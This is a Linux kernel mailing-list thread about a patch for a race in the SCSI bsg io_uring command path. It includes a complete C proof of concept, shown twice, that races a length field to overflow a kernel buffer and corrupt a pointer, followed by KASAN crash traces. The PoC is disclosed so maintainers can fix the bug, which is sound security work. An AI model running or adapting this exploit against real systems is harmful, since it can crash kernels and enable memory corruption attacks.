Linux block layer

Linux block layer
 help / color / mirror / Atom feed

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Jens Axboe @ 2026-05-27 16:45 UTC (permalink / raw)
  To: Caleb Sander Mateos, Rahul Chandelkar
  Cc: James.Bottomley, martin.petersen, fujita.tomonori, linux-scsi,
	linux-block, io-uring
In-Reply-To: <CADUfDZr6LJckoVt2NRfRt3Njs-WAqsg5-QnTDi6xbUDiO950Fw@mail.gmail.com>

On 5/27/26 10:27 AM, Caleb Sander Mateos wrote:
> On Wed, May 27, 2026 at 9:19 AM Rahul Chandelkar <rc@rexion.ai> wrote:
>>
>> On Wed, May 27, 2026 at 10:06:44AM -0600, Jens Axboe wrote:
>>> I don't think this is the right way to fix it, ->sqe should've been
>>> stable upfront if this ends up happening. Can you share your poc with
>>> me? Your trace has been trimmed down way too much to be useful.
>>
>> Agreed that a core-level copy before the inline callback would be the
>> right fix and would eliminate the entire class for every uring_cmd
>> driver. The per-driver copy was meant as a minimal backportable fix
>> for the immediate scsi_bsg path.
>>
>> PoC and full trace below.
>>
>> --- PoC (poc_bsg_toctou.c) ---
>>
>> Build:  gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
>> Usage:  ./poc /dev/bsg/X
>> Needs:  2+ CPUs, io_uring, /dev/bsg/* access
>>
>> The racer thread flips request_len between 16 (passes the <=32 bounds
>> check) and 128 (used by copy_from_user, overflows scmd->cmnd[32]).
>> The overflow payload plants 0xdead000000001000 at the sense_buffer
>> pointer offset (+84 from cmnd[0]). When scsi_queue_rq() does
>> memset(scmd->sense_buffer, 0, SCSI_SENSE_BUFFERSIZE) it faults on the
>> corrupted pointer.
> 
> Then the fix is to use READ_ONCE() to access the SQE fields, right?
> Copying the entire SQE seems like unnecessary overhead. See
> nvme_uring_cmd_io() for prior art.

That is indeed the correct fix.

-- 
Jens Axboe


^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Caleb Sander Mateos @ 2026-05-27 16:27 UTC (permalink / raw)
  To: Rahul Chandelkar
  Cc: axboe, James.Bottomley, martin.petersen, fujita.tomonori,
	linux-scsi, linux-block, io-uring
In-Reply-To: <20260527161926.4071110-1-rc@rexion.ai>

On Wed, May 27, 2026 at 9:19 AM Rahul Chandelkar <rc@rexion.ai> wrote:
>
> On Wed, May 27, 2026 at 10:06:44AM -0600, Jens Axboe wrote:
> > I don't think this is the right way to fix it, ->sqe should've been
> > stable upfront if this ends up happening. Can you share your poc with
> > me? Your trace has been trimmed down way too much to be useful.
>
> Agreed that a core-level copy before the inline callback would be the
> right fix and would eliminate the entire class for every uring_cmd
> driver. The per-driver copy was meant as a minimal backportable fix
> for the immediate scsi_bsg path.
>
> PoC and full trace below.
>
> --- PoC (poc_bsg_toctou.c) ---
>
> Build:  gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
> Usage:  ./poc /dev/bsg/X
> Needs:  2+ CPUs, io_uring, /dev/bsg/* access
>
> The racer thread flips request_len between 16 (passes the <=32 bounds
> check) and 128 (used by copy_from_user, overflows scmd->cmnd[32]).
> The overflow payload plants 0xdead000000001000 at the sense_buffer
> pointer offset (+84 from cmnd[0]). When scsi_queue_rq() does
> memset(scmd->sense_buffer, 0, SCSI_SENSE_BUFFERSIZE) it faults on the
> corrupted pointer.

Then the fix is to use READ_ONCE() to access the SQE fields, right?
Copying the entire SQE seems like unnecessary overhead. See
nvme_uring_cmd_io() for prior art.

Best,
Caleb

>
> Tested on v7.1-rc1, KASAN, QEMU virtio-scsi, 2 vCPUs.
>
> /*
>  * PoC: SCSI BSG uring_cmd TOCTOU heap buffer overflow
>  *
>  * Overflows scmd->cmnd[32] to corrupt sense_buffer pointer.
>  * On successful race, memset(corrupted_sense_buffer, 0, 96) in
>  * scsi_queue_rq() causes a kernel fault proving the vulnerability.
>  *
>  * Usage: ./poc /dev/bsg/X
>  * Build: gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
>  */
>
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <pthread.h>
> #include <sched.h>
> #include <stdatomic.h>
> #include <stdint.h>
> #include <sys/mman.h>
> #include <sys/syscall.h>
> #include <linux/io_uring.h>
>
> struct bsg_uring_cmd {
>         uint64_t request;
>         uint32_t request_len;
>         uint32_t protocol;
>         uint32_t subprotocol;
>         uint32_t max_response_len;
>         uint64_t response;
>         uint64_t dout_xferp;
>         uint32_t dout_xfer_len;
>         uint32_t dout_iovec_count;
>         uint64_t din_xferp;
>         uint32_t din_xfer_len;
>         uint32_t din_iovec_count;
>         uint32_t timeout_ms;
>         uint8_t  reserved[12];
> };
>
> #define QUEUE_DEPTH   4
> #define OVERFLOW_LEN  128
> #define SAFE_LEN      16
>
> static atomic_int stop_flag = 0;
>
> static int sys_io_uring_setup(unsigned entries, struct io_uring_params *p)
> {
>         return syscall(__NR_io_uring_setup, entries, p);
> }
>
> static int sys_io_uring_enter(int fd, unsigned to_submit,
>                               unsigned min_complete, unsigned flags)
> {
>         return syscall(__NR_io_uring_enter, fd, to_submit, min_complete,
>                        flags, NULL, 0);
> }
>
> struct race_ctx {
>         volatile uint32_t *target;
>         int cpu;
> };
>
> static void *racer_thread(void *arg)
> {
>         struct race_ctx *ctx = arg;
>         cpu_set_t cpuset;
>
>         CPU_ZERO(&cpuset);
>         CPU_SET(ctx->cpu, &cpuset);
>         sched_setaffinity(0, sizeof(cpuset), &cpuset);
>
>         while (!atomic_load_explicit(&stop_flag, memory_order_relaxed)) {
>                 *ctx->target = OVERFLOW_LEN;
>                 *ctx->target = OVERFLOW_LEN;
>                 *ctx->target = OVERFLOW_LEN;
>                 *ctx->target = OVERFLOW_LEN;
>         }
>         return NULL;
> }
>
> int main(int argc, char **argv)
> {
>         struct io_uring_params params;
>         int ring_fd, bsg_fd;
>         void *sq_ring, *cq_ring, *sqe_ring;
>         unsigned *sq_head, *sq_tail, *sq_mask, *sq_array;
>         unsigned *cq_head, *cq_tail, *cq_mask;
>         size_t sqe_stride;
>         pthread_t racer;
>         struct race_ctx rctx;
>         int i, attempts = 0;
>         int max_attempts = 500000;
>
>         if (argc < 2) {
>                 fprintf(stderr, "Usage: %s /dev/bsg/X\n", argv[0]);
>                 return 1;
>         }
>
>         bsg_fd = open(argv[1], O_RDWR);
>         if (bsg_fd < 0) {
>                 perror("open bsg");
>                 return 1;
>         }
>
>         cpu_set_t cpuset;
>         CPU_ZERO(&cpuset);
>         CPU_SET(0, &cpuset);
>         sched_setaffinity(0, sizeof(cpuset), &cpuset);
>
>         memset(&params, 0, sizeof(params));
>         params.flags = IORING_SETUP_SQE128 | IORING_SETUP_CQE32;
>
>         ring_fd = sys_io_uring_setup(QUEUE_DEPTH, &params);
>         if (ring_fd < 0) {
>                 perror("io_uring_setup");
>                 return 1;
>         }
>
>         size_t sq_ring_sz = params.sq_off.array +
>                             params.sq_entries * sizeof(unsigned);
>         sq_ring = mmap(NULL, sq_ring_sz, PROT_READ | PROT_WRITE,
>                        MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_SQ_RING);
>
>         sq_head  = sq_ring + params.sq_off.head;
>         sq_tail  = sq_ring + params.sq_off.tail;
>         sq_mask  = sq_ring + params.sq_off.ring_mask;
>         sq_array = sq_ring + params.sq_off.array;
>
>         sqe_stride = 2 * sizeof(struct io_uring_sqe);
>         sqe_ring = mmap(NULL, params.sq_entries * sqe_stride,
>                         PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
>                         ring_fd, IORING_OFF_SQES);
>
>         size_t cqe_size = sizeof(struct io_uring_cqe) + 16;
>         size_t cq_ring_sz = params.cq_off.cqes +
>                             params.cq_entries * cqe_size;
>         cq_ring = mmap(NULL, cq_ring_sz, PROT_READ | PROT_WRITE,
>                        MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_CQ_RING);
>
>         cq_head = cq_ring + params.cq_off.head;
>         cq_tail = cq_ring + params.cq_off.tail;
>         cq_mask = cq_ring + params.cq_off.ring_mask;
>
>         unsigned char payload[OVERFLOW_LEN];
>         memset(payload, 0x41, sizeof(payload));
>         payload[0] = 0x12; /* INQUIRY opcode */
>
>         uint64_t bad_sense = 0xdead000000001000ULL;
>         memcpy(payload + 84, &bad_sense, 8);
>
>         printf("[*] SCSI BSG uring_cmd TOCTOU PoC\n");
>         printf("[*] Target: %s\n", argv[1]);
>         printf("[*] Overflow: %d -> %d bytes (sense_buffer at +84)\n",
>                SAFE_LEN, OVERFLOW_LEN);
>         printf("[*] Bad sense_buffer: 0x%lx\n", (unsigned long)bad_sense);
>
>         rctx.cpu = 1;
>
>         while (attempts < max_attempts) {
>                 unsigned tail = *sq_tail;
>                 unsigned idx = tail & *sq_mask;
>
>                 struct io_uring_sqe *sqe =
>                         (struct io_uring_sqe *)((char *)sqe_ring +
>                                                 idx * sqe_stride);
>                 memset(sqe, 0, sqe_stride);
>
>                 sqe->opcode = IORING_OP_URING_CMD;
>                 sqe->fd = bsg_fd;
>
>                 struct bsg_uring_cmd *cmd =
>                         (struct bsg_uring_cmd *)((char *)sqe + 48);
>
>                 cmd->request     = (uint64_t)(unsigned long)payload;
>                 cmd->request_len = SAFE_LEN;
>                 cmd->protocol    = 0;
>                 cmd->subprotocol = 0;
>                 cmd->max_response_len = 96;
>                 cmd->timeout_ms  = 1000;
>
>                 rctx.target = &cmd->request_len;
>
>                 if (attempts == 0) {
>                         pthread_create(&racer, NULL, racer_thread, &rctx);
>                         usleep(1000);
>                 }
>
>                 sq_array[idx] = idx;
>
>                 cmd->request_len = SAFE_LEN;
>                 __atomic_store_n(sq_tail, tail + 1, __ATOMIC_RELEASE);
>
>                 sys_io_uring_enter(ring_fd, 1, 1, IORING_ENTER_GETEVENTS);
>
>                 while (*cq_head != *cq_tail)
>                         __atomic_store_n(cq_head, *cq_head + 1,
>                                          __ATOMIC_RELEASE);
>
>                 attempts++;
>                 if (attempts % 50000 == 0)
>                         printf("[*] %d attempts...\n", attempts);
>         }
>
>         atomic_store(&stop_flag, 1);
>         pthread_join(racer, NULL);
>
>         printf("[!] %d attempts done. Check dmesg for crash.\n", attempts);
>
>         close(bsg_fd);
>         close(ring_fd);
>         return 0;
> }
>
> --- Full KASAN trace (untruncated) ---
>
> [    4.784469] ==================================================================
> [    4.784815] BUG: KASAN: wild-memory-access in scsi_queue_rq+0x4a3/0x58a0
> [    4.785140] Write of size 96 at addr dead000000001000 by task poc/67
> [    4.785443]
> [    4.785529] CPU: 0 UID: 0 PID: 67 Comm: poc Not tainted 7.1.0-rc1 #2 PREEMPT(lazy)
> [    4.785532] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> [    4.785534] Call Trace:
> [    4.785536]  <TASK>
> [    4.785537]  dump_stack_lvl+0x53/0x70
> [    4.785540]  kasan_report+0xce/0x100
> [    4.785543]  ? scsi_queue_rq+0x4a3/0x58a0
> [    4.785546]  kasan_check_range+0x105/0x1b0
> [    4.785549]  __asan_memset+0x23/0x50
> [    4.785550]  scsi_queue_rq+0x4a3/0x58a0
> [    4.785553]  ? __pfx_scsi_queue_rq+0x10/0x10
> [    4.785556]  ? scsi_mq_get_budget+0xa8/0x670
> [    4.785558]  blk_mq_dispatch_rq_list+0x462/0x42b0
> [    4.785561]  ? blk_mq_rq_ctx_init+0x57a/0xcc0
> [    4.785564]  ? __pfx_blk_mq_dispatch_rq_list+0x10/0x10
> [    4.785566]  ? __pfx__raw_spin_lock+0x10/0x10
> [    4.785569]  __blk_mq_sched_dispatch_requests+0x2e2/0x23a0
> [    4.785574]  ? __pfx___blk_mq_sched_dispatch_requests+0x10/0x10
> [    4.785580]  ? blk_mq_insert_request+0x402/0x13f0
> [    4.785582]  blk_mq_sched_dispatch_requests+0xec/0x270
> [    4.785584]  blk_mq_run_hw_queue+0x797/0x10e0
> [    4.785586]  scsi_bsg_uring_cmd+0x942/0x1570
> [    4.785588]  ? __pfx_scsi_bsg_uring_cmd+0x10/0x10
> [    4.785594]  io_uring_cmd+0x2f6/0x950
> [    4.785599]  __io_issue_sqe+0xb6/0xcc0
> [    4.785601]  io_issue_sqe+0xe5/0x22d0
> [    4.785606]  ? io_uring_cmd_prep+0x619/0xa10
> [    4.785609]  io_submit_sqes+0xb4a/0x4540
> [    4.785614]  __do_sys_io_uring_enter+0x148c/0x2f50
> [    4.785618]  do_syscall_64+0xf9/0x540
> [    4.785621]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
>
> Second fault (completion path reading corrupted sense_buffer):
>
> [    4.799563] KASAN: maybe wild-memory-access in range [0xdead000000001000-0xdead000000001007]
> [    4.800411] RIP: 0010:scsi_normalize_sense+0x47/0x480
> [    4.803461] R12: dead000000001000
> [    4.841254] Kernel panic - not syncing: Fatal exception in interrupt
>
> R12 holds the corrupted sense_buffer pointer (0xdead000000001000),
> confirming the overflow overwrote sense_buffer at the expected offset.
>
> The io_submit_sqes -> io_issue_sqe -> io_uring_cmd -> scsi_bsg_uring_cmd
> path shows this is the inline execution path where the SQE has not been
> copied to kernel memory yet.
>
> Rahul
>

^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Rahul Chandelkar @ 2026-05-27 16:19 UTC (permalink / raw)
  To: axboe
  Cc: James.Bottomley, martin.petersen, fujita.tomonori, linux-scsi,
	linux-block, io-uring
In-Reply-To: <ee931505-64a2-411d-8607-3db8912b70c4@kernel.dk>

On Wed, May 27, 2026 at 10:06:44AM -0600, Jens Axboe wrote:
> I don't think this is the right way to fix it, ->sqe should've been
> stable upfront if this ends up happening. Can you share your poc with
> me? Your trace has been trimmed down way too much to be useful.

Agreed that a core-level copy before the inline callback would be the
right fix and would eliminate the entire class for every uring_cmd
driver. The per-driver copy was meant as a minimal backportable fix
for the immediate scsi_bsg path.

PoC and full trace below.

--- PoC (poc_bsg_toctou.c) ---

Build:  gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
Usage:  ./poc /dev/bsg/X
Needs:  2+ CPUs, io_uring, /dev/bsg/* access

The main thread sets request_len to 16 (passes the <=32 bounds check)
before each submission, while the racer thread keeps overwriting it
with 128 (used by copy_from_user, overflows scmd->cmnd[32]).
The overflow payload plants 0xdead000000001000 at the sense_buffer
pointer offset (+84 from cmnd[0]). When scsi_queue_rq() does
memset(scmd->sense_buffer, 0, SCSI_SENSE_BUFFERSIZE) it faults on the
corrupted pointer.

Tested on v7.1-rc1, KASAN, QEMU virtio-scsi, 2 vCPUs.

/*
 * PoC: SCSI BSG uring_cmd TOCTOU heap buffer overflow
 *
 * Overflows scmd->cmnd[32] to corrupt sense_buffer pointer.
 * On successful race, memset(corrupted_sense_buffer, 0, 96) in
 * scsi_queue_rq() causes a kernel fault proving the vulnerability.
 *
 * Usage: ./poc /dev/bsg/X
 * Build: gcc -O2 -pthread -static -o poc poc_bsg_toctou.c
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

/*
 * Local definition of the command payload that main() overlays at byte
 * offset 48 of each submission queue entry.  The fields add up to 80
 * bytes.  NOTE(review): presumably this mirrors the kernel's bsg
 * uring_cmd layout -- confirm against the kernel headers.
 */
struct bsg_uring_cmd {
	uint64_t request;		/* main() stores the address of its payload buffer here */
	uint32_t request_len;		/* the field racer_thread() overwrites via race_ctx.target */
	uint32_t protocol;		/* set to 0 by main() */
	uint32_t subprotocol;		/* set to 0 by main() */
	uint32_t max_response_len;	/* set to 96 by main() */
	uint64_t response;
	uint64_t dout_xferp;
	uint32_t dout_xfer_len;
	uint32_t dout_iovec_count;
	uint64_t din_xferp;
	uint32_t din_xfer_len;
	uint32_t din_iovec_count;
	uint32_t timeout_ms;		/* set to 1000 by main() */
	uint8_t  reserved[12];
};

/* Number of entries main() requests from io_uring_setup(). */
#define QUEUE_DEPTH   4
/* Size of the payload buffer, and the value racer_thread() stores into request_len. */
#define OVERFLOW_LEN  128
/* The request_len value main() writes before publishing each SQE. */
#define SAFE_LEN      16

/* Set to 1 by main() after the last attempt; polled by racer_thread() to leave its loop. */
static atomic_int stop_flag = 0;

/*
 * Invoke the raw io_uring_setup system call through syscall().
 *
 * @entries: passed through unchanged as the first syscall argument
 * @p:       passed through unchanged as the second syscall argument
 *
 * Returns whatever syscall() returned, narrowed to int.
 */
static int sys_io_uring_setup(unsigned entries, struct io_uring_params *p)
{
	long rc = syscall(__NR_io_uring_setup, entries, p);

	return (int)rc;
}

/*
 * Invoke the raw io_uring_enter system call through syscall().
 *
 * @fd, @to_submit, @min_complete and @flags are forwarded unchanged; the
 * two trailing syscall arguments are always NULL and 0.
 *
 * Returns whatever syscall() returned, narrowed to int.
 */
static int sys_io_uring_enter(int fd, unsigned to_submit,
			      unsigned min_complete, unsigned flags)
{
	long rc;

	rc = syscall(__NR_io_uring_enter, fd, to_submit, min_complete,
		     flags, NULL, 0);
	return (int)rc;
}

/* Arguments handed from main() to racer_thread(). */
struct race_ctx {
	volatile uint32_t *target;	/* location racer_thread() keeps storing OVERFLOW_LEN to */
	int cpu;			/* CPU index racer_thread() pins itself to */
};

/*
 * Thread body for the racing writer.
 *
 * @arg: pointer to a struct race_ctx.
 *
 * Pins the calling thread to race_ctx.cpu (the sched_setaffinity() result
 * is not checked), then stores OVERFLOW_LEN through race_ctx.target four
 * times per iteration until stop_flag becomes non-zero.  Always returns
 * NULL.
 */
static void *racer_thread(void *arg)
{
	struct race_ctx *rc = arg;
	cpu_set_t mask;

	CPU_ZERO(&mask);
	CPU_SET(rc->cpu, &mask);
	sched_setaffinity(0, sizeof(mask), &mask);

	for (;;) {
		if (atomic_load_explicit(&stop_flag, memory_order_relaxed))
			break;

		/* Four back-to-back volatile stores per stop_flag poll. */
		*rc->target = OVERFLOW_LEN;
		*rc->target = OVERFLOW_LEN;
		*rc->target = OVERFLOW_LEN;
		*rc->target = OVERFLOW_LEN;
	}

	return NULL;
}

/*
 * Reproducer driver.
 *
 * Opens the bsg device named by argv[1], creates an io_uring with
 * IORING_SETUP_SQE128 | IORING_SETUP_CQE32, maps the SQ ring, the SQE
 * array and the CQ ring, and then submits IORING_OP_URING_CMD requests
 * one at a time (max_attempts in total) while racer_thread() keeps
 * overwriting the request_len field of the SQE being submitted.
 *
 * Returns 0 once all attempts have been submitted, or 1 when setup fails
 * (missing argument, open(), io_uring_setup(), any mmap(), or
 * pthread_create()).
 */
int main(int argc, char **argv)
{
	struct io_uring_params params;
	int ring_fd, bsg_fd;
	void *sq_ring, *cq_ring, *sqe_ring;
	unsigned *sq_tail, *sq_mask, *sq_array;
	unsigned *cq_head, *cq_tail;
	size_t sqe_stride;
	pthread_t racer;
	struct race_ctx rctx;
	int attempts = 0;
	int max_attempts = 500000;

	if (argc < 2) {
		fprintf(stderr, "Usage: %s /dev/bsg/X\n", argv[0]);
		return 1;
	}

	bsg_fd = open(argv[1], O_RDWR);
	if (bsg_fd < 0) {
		perror("open bsg");
		return 1;
	}

	/* Submitter runs on CPU 0; the racer is pinned to CPU 1 (rctx.cpu). */
	cpu_set_t cpuset;
	CPU_ZERO(&cpuset);
	CPU_SET(0, &cpuset);
	sched_setaffinity(0, sizeof(cpuset), &cpuset);

	memset(&params, 0, sizeof(params));
	params.flags = IORING_SETUP_SQE128 | IORING_SETUP_CQE32;

	ring_fd = sys_io_uring_setup(QUEUE_DEPTH, &params);
	if (ring_fd < 0) {
		perror("io_uring_setup");
		return 1;
	}

	size_t sq_ring_sz = params.sq_off.array +
			    params.sq_entries * sizeof(unsigned);
	sq_ring = mmap(NULL, sq_ring_sz, PROT_READ | PROT_WRITE,
		       MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_SQ_RING);
	if (sq_ring == MAP_FAILED) {
		perror("mmap sq ring");
		return 1;
	}

	/* Byte offsets are applied through char * (void * arithmetic is a GNU extension). */
	sq_tail  = (unsigned *)((char *)sq_ring + params.sq_off.tail);
	sq_mask  = (unsigned *)((char *)sq_ring + params.sq_off.ring_mask);
	sq_array = (unsigned *)((char *)sq_ring + params.sq_off.array);

	/* With IORING_SETUP_SQE128 each slot is two struct io_uring_sqe wide. */
	sqe_stride = 2 * sizeof(struct io_uring_sqe);
	sqe_ring = mmap(NULL, params.sq_entries * sqe_stride,
			PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
			ring_fd, IORING_OFF_SQES);
	if (sqe_ring == MAP_FAILED) {
		perror("mmap sqes");
		return 1;
	}

	/* NOTE(review): the +16 presumably accounts for the CQE32 extension -- confirm. */
	size_t cqe_size = sizeof(struct io_uring_cqe) + 16;
	size_t cq_ring_sz = params.cq_off.cqes +
			    params.cq_entries * cqe_size;
	cq_ring = mmap(NULL, cq_ring_sz, PROT_READ | PROT_WRITE,
		       MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_CQ_RING);
	if (cq_ring == MAP_FAILED) {
		perror("mmap cq ring");
		return 1;
	}

	cq_head = (unsigned *)((char *)cq_ring + params.cq_off.head);
	cq_tail = (unsigned *)((char *)cq_ring + params.cq_off.tail);

	/* Payload: 0x41 filler, opcode byte at [0], marker value at offset 84. */
	unsigned char payload[OVERFLOW_LEN];
	memset(payload, 0x41, sizeof(payload));
	payload[0] = 0x12; /* INQUIRY opcode */

	uint64_t bad_sense = 0xdead000000001000ULL;
	memcpy(payload + 84, &bad_sense, 8);

	printf("[*] SCSI BSG uring_cmd TOCTOU PoC\n");
	printf("[*] Target: %s\n", argv[1]);
	printf("[*] Overflow: %d -> %d bytes (sense_buffer at +84)\n",
	       SAFE_LEN, OVERFLOW_LEN);
	printf("[*] Bad sense_buffer: 0x%lx\n", (unsigned long)bad_sense);

	rctx.cpu = 1;

	while (attempts < max_attempts) {
		unsigned tail = *sq_tail;
		unsigned idx = tail & *sq_mask;

		struct io_uring_sqe *sqe =
			(struct io_uring_sqe *)((char *)sqe_ring +
						idx * sqe_stride);
		memset(sqe, 0, sqe_stride);

		sqe->opcode = IORING_OP_URING_CMD;
		sqe->fd = bsg_fd;

		/* The command payload is overlaid at byte offset 48 of the SQE. */
		struct bsg_uring_cmd *cmd =
			(struct bsg_uring_cmd *)((char *)sqe + 48);

		cmd->request     = (uint64_t)(unsigned long)payload;
		cmd->request_len = SAFE_LEN;
		cmd->protocol    = 0;
		cmd->subprotocol = 0;
		cmd->max_response_len = 96;
		cmd->timeout_ms  = 1000;

		/*
		 * NOTE(review): rctx.target is rewritten here on every
		 * iteration with no synchronization against the racer
		 * thread that reads it.
		 */
		rctx.target = &cmd->request_len;

		if (attempts == 0) {
			/* Start the racer once, after rctx is fully set up. */
			int err = pthread_create(&racer, NULL, racer_thread,
						 &rctx);
			if (err != 0) {
				fprintf(stderr, "pthread_create: %s\n",
					strerror(err));
				return 1;
			}
			usleep(1000);
		}

		sq_array[idx] = idx;

		/* Store SAFE_LEN again immediately before publishing the new tail. */
		cmd->request_len = SAFE_LEN;
		__atomic_store_n(sq_tail, tail + 1, __ATOMIC_RELEASE);

		sys_io_uring_enter(ring_fd, 1, 1, IORING_ENTER_GETEVENTS);

		/* Discard every posted completion by advancing the CQ head. */
		while (*cq_head != *cq_tail)
			__atomic_store_n(cq_head, *cq_head + 1,
					 __ATOMIC_RELEASE);

		attempts++;
		if (attempts % 50000 == 0)
			printf("[*] %d attempts...\n", attempts);
	}

	atomic_store(&stop_flag, 1);
	pthread_join(racer, NULL);

	printf("[!] %d attempts done. Check dmesg for crash.\n", attempts);

	close(bsg_fd);
	close(ring_fd);
	return 0;
}

--- Full KASAN trace (untruncated) ---

[    4.784469] ==================================================================
[    4.784815] BUG: KASAN: wild-memory-access in scsi_queue_rq+0x4a3/0x58a0
[    4.785140] Write of size 96 at addr dead000000001000 by task poc/67
[    4.785443] 
[    4.785529] CPU: 0 UID: 0 PID: 67 Comm: poc Not tainted 7.1.0-rc1 #2 PREEMPT(lazy) 
[    4.785532] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    4.785534] Call Trace:
[    4.785536]  <TASK>
[    4.785537]  dump_stack_lvl+0x53/0x70
[    4.785540]  kasan_report+0xce/0x100
[    4.785543]  ? scsi_queue_rq+0x4a3/0x58a0
[    4.785546]  kasan_check_range+0x105/0x1b0
[    4.785549]  __asan_memset+0x23/0x50
[    4.785550]  scsi_queue_rq+0x4a3/0x58a0
[    4.785553]  ? __pfx_scsi_queue_rq+0x10/0x10
[    4.785556]  ? scsi_mq_get_budget+0xa8/0x670
[    4.785558]  blk_mq_dispatch_rq_list+0x462/0x42b0
[    4.785561]  ? blk_mq_rq_ctx_init+0x57a/0xcc0
[    4.785564]  ? __pfx_blk_mq_dispatch_rq_list+0x10/0x10
[    4.785566]  ? __pfx__raw_spin_lock+0x10/0x10
[    4.785569]  __blk_mq_sched_dispatch_requests+0x2e2/0x23a0
[    4.785574]  ? __pfx___blk_mq_sched_dispatch_requests+0x10/0x10
[    4.785580]  ? blk_mq_insert_request+0x402/0x13f0
[    4.785582]  blk_mq_sched_dispatch_requests+0xec/0x270
[    4.785584]  blk_mq_run_hw_queue+0x797/0x10e0
[    4.785586]  scsi_bsg_uring_cmd+0x942/0x1570
[    4.785588]  ? __pfx_scsi_bsg_uring_cmd+0x10/0x10
[    4.785594]  io_uring_cmd+0x2f6/0x950
[    4.785599]  __io_issue_sqe+0xb6/0xcc0
[    4.785601]  io_issue_sqe+0xe5/0x22d0
[    4.785606]  ? io_uring_cmd_prep+0x619/0xa10
[    4.785609]  io_submit_sqes+0xb4a/0x4540
[    4.785614]  __do_sys_io_uring_enter+0x148c/0x2f50
[    4.785618]  do_syscall_64+0xf9/0x540
[    4.785621]  entry_SYSCALL_64_after_hwframe+0x77/0x7f

Second fault (completion path reading corrupted sense_buffer):

[    4.799563] KASAN: maybe wild-memory-access in range [0xdead000000001000-0xdead000000001007]
[    4.800411] RIP: 0010:scsi_normalize_sense+0x47/0x480
[    4.803461] R12: dead000000001000
[    4.841254] Kernel panic - not syncing: Fatal exception in interrupt

R12 holds the corrupted sense_buffer pointer (0xdead000000001000),
confirming the overflow overwrote sense_buffer at the expected offset.

The io_submit_sqes -> io_issue_sqe -> io_uring_cmd -> scsi_bsg_uring_cmd
path shows this is the inline execution path where the SQE has not been
copied to kernel memory yet.

Rahul

^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Jens Axboe @ 2026-05-27 16:06 UTC (permalink / raw)
  To: Rahul Chandelkar, James E . J . Bottomley, Martin K . Petersen,
	FUJITA Tomonori
  Cc: linux-scsi, linux-block, io-uring, linux-kernel, stable
In-Reply-To: <20260527105931.3950913-1-rc@rexion.ai>

On 5/27/26 4:59 AM, Rahul Chandelkar wrote:
> scsi_bsg_uring_cmd() and scsi_bsg_map_user_buffer() read bsg_uring_cmd
> fields directly from the shared mmap'd io_uring submission ring via
> io_uring_sqe128_cmd().  On the inline execution path, io_uring has not
> yet copied the SQE to kernel memory, so a concurrent userspace thread
> can modify fields between reads.
> 
> cmd->request_len is read for the bounds check, for the cmd_len
> assignment, and for the copy_from_user length.  A racing thread can
> change request_len between the bounds check (passes with <= 32) and
> copy_from_user (uses the enlarged value), overflowing the 32-byte
> scmd->cmnd[] buffer into subsequent struct scsi_cmnd fields.
> 
> scsi_bsg_map_user_buffer() independently re-derives its cmd pointer
> from the same shared SQE, re-reading dout_xfer_len, din_xfer_len,
> dout_xferp, and din_xferp, enabling direction confusion and buffer
> length races.
> 
> Copy struct bsg_uring_cmd to a stack-local variable before use in both
> functions.  The pointer variable 'cmd' is redirected to the local copy
> so the rest of each function is unchanged.
> 
> Tested with KASAN on QEMU (virtio-scsi, 2 vCPUs).  Without this fix,
> a two-thread race produces:
> 
>   BUG: KASAN: wild-memory-access in scsi_queue_rq+0x4a3/0x58a0
>   Write of size 96 at addr dead000000001000 by task poc/67
>   Call Trace:
>    kasan_report+0xce/0x100
>    __asan_memset+0x23/0x50
>    scsi_queue_rq+0x4a3/0x58a0
>    scsi_bsg_uring_cmd+0x942/0x1570
>    io_uring_cmd+0x2f6/0x950
>    io_issue_sqe+0xe5/0x22d0

I don't think this is the right way to fix it, ->sqe should've been
stable upfront if this ends up happening. Can you share your poc with
me? Your trace has been trimmed down way too much to be useful.

-- 
Jens Axboe

^ permalink raw reply

* Re: [PATCH] scsi: bsg: copy uring_cmd payload to prevent double-fetch from shared SQE
From: Bart Van Assche @ 2026-05-27 16:03 UTC (permalink / raw)
  To: Rahul Chandelkar, James E . J . Bottomley, Martin K . Petersen,
	Jens Axboe, FUJITA Tomonori
  Cc: linux-scsi, linux-block, io-uring, linux-kernel, stable
In-Reply-To: <20260527105931.3950913-1-rc@rexion.ai>

On 5/27/26 3:59 AM, Rahul Chandelkar wrote:
> scsi_bsg_uring_cmd() and scsi_bsg_map_user_buffer() read bsg_uring_cmd
> fields directly from the shared mmap'd io_uring submission ring via
> io_uring_sqe128_cmd().  On the inline execution path, io_uring has not
> yet copied the SQE to kernel memory, so a concurrent userspace thread
> can modify fields between reads.
Reviewed-by: Bart Van Assche <bvanassche@acm.org>

^ permalink raw reply

* Re: [PATCH] block: Add bvec_folio()
From: Matthew Wilcox @ 2026-05-27 15:54 UTC (permalink / raw)
  To: Christoph Hellwig
